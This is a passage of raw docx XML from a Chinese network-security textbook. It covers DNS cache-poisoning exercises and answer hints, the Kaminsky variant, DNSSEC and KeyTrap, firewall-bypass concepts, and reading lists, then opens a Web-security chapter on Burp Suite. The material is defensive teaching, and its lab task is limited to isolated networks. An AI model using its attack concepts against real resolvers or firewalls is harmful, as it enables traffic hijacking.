        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓存投毒能够成功主要依赖于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议中的哪些假设？这些假设在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Internet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">早期设计背景下为何是合理的？（提示：考虑查询与响应的关联方式。）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1079"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：DNSSEC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是如何从原理上防止</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓存投毒的？它引入了哪些新的安全风险？（提示：KeyTrap、管理复杂度。）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1079"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">迁移任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在你的隔离实验环境中，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">抓取一次完整的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">递归查询过程（可对自建解析器发起查询），观察</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报文中的事务</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID、源端口、递归标志位。阅读</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BIND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Unbound </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的配置手册，启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNSSEC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">验证并对一个已签名的域（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cloudflare.com.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）再次抓包，对比</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">AD（已验证数据）标志位的出现。然后，尝试在解析器上配置出站</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问控制列表，仅允许向指定上游服务器发起查询，并验证其他查询被拒绝。记录实验步骤并解释每条配置的防御意义。（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">注意：所有操作必须在授权的隔离实验网络中进行，切不可对公共</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">服务器实施任何非法测试。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="141" w:name="习题解答提示"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题解答提示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1080"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第1题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：缓存投毒依赖于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应是无状态的、无加密签名的，仅凭事务</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及端口号匹配请求。早期互联网互信度较高，协议设计优先考虑速度与简单性，且威胁模型不同。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1080"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第2题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：DNSSEC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过公钥签名链提供数据来源验证和完整性保护，递归解析器可以验证从根区到目标域名的签名，从而忽略未签名的伪造响应。新风险包括密钥管理失败导致服务整体不可达、签名计算消耗资源的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DoS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击、以及部分部署导致的复杂性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1080"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第3题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：迁移任务的具体执行请参阅《从位到物联》第26</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验与本书第4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">枚举部分，并结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Unbound/BIND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官方文档。防御意义：ACL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">限制可以减少攻击者利用递归解析器发起投毒或放大攻击的机会；DNSSEC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则是从源头消除投毒可能。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="141"/>
    <w:bookmarkEnd w:id="142"/>
    <w:bookmarkStart w:id="143" w:name="小结-9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓存投毒本质是对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议“无认证”假设的攻击，通过伪造响应抢先污染解析器缓存，可导致域名劫持。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kaminsky </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">变种巧妙利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> additional </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录扩大污染范围，促使业界更积极地推广源端口/查询随机化及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNSSEC。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DNSSEC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过签名链实现数据完整性认证，是抵御</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗的根本方案，但需关注其自身的安全运维。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防火墙绕过概念展示了仅依赖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP/端口过滤的局限性；分片重组缺失和应用层隧道是常见突破点。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">纵深防御法则：网络边界应部署有状态防火墙并执行分片重组，出站流量默认禁止，同时结合深度包检测识别隧道行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全还须关注内部递归解析器的配置安全，包括限制查询来源、启用验证、监控异常，以防止攻击者利用其作为跳板。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队应利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络技术指标和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NIST SP 800 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系列指南，建立从边界到主机的多层次检测和阻断体系。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">综合来看，二层交换中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隔离缺失与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">无认证，以及本节</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与防火墙的信任假设，均提醒我们必须对所有控制平面协议施加强验证和最小权限，才能构建连贯的纵深防御。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="143"/>
    <w:bookmarkStart w:id="144" w:name="延伸阅读白名单-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bejtlich, R.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Practice of Network Security Monitoring: Understanding Incident Detection and Response</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. No Starch Press. —— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结合网络取证与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">异常检测的实践佳作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NIST Special Publication 800-41 Rev. 1,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Guidelines on Firewalls and Firewall Policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. —— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防火墙部署与策略管理的权威指南。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NIST Special Publication 800-81-2,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Secure Domain Name System (DNS) Deployment Guide</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. —— DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全部署的详细建议，包括</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNSSEC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实践。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MITRE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ATT&amp;CK——网络分层技术，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">T1043（常用端口）、T1071（应用层协议）、T1090（连接代理），可用于指导检测用例的开发。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">《从位到物联》第26</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原理及第28</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章防火墙/ACL，作为本节的前置知识回顾。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cloudflare Blog </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等公开资料关于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNSSEC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部署与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KeyTrap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击分析的介绍（注意仅为参考，不列入教材核心正文）。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="144"/>
    <w:bookmarkEnd w:id="145"/>
    <w:bookmarkEnd w:id="146"/>
    <w:bookmarkStart w:id="232" w:name="卷三-web-应用安全第-812-章"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">卷三</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> · Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用安全（第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8–12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="163" w:name="web-攻防基础httpburp-suite-与-owasp-top-10"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8 Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻防基础:HTTP、Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="147" w:name="http-安全要点与-burp-suite-代理拦截"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1 HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全要点与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理拦截</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">馆藏基础</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求/响应结构、方法（GET/POST）、状态码、Cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">机制已见《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 28 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章，本节直接使用不重讲。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机与工具回指</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：DVWA、SQLi-labs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等靶机搭建回指本书第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章；Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">社区版获取与基础配置见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">本章定位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：本节作为第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章“Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
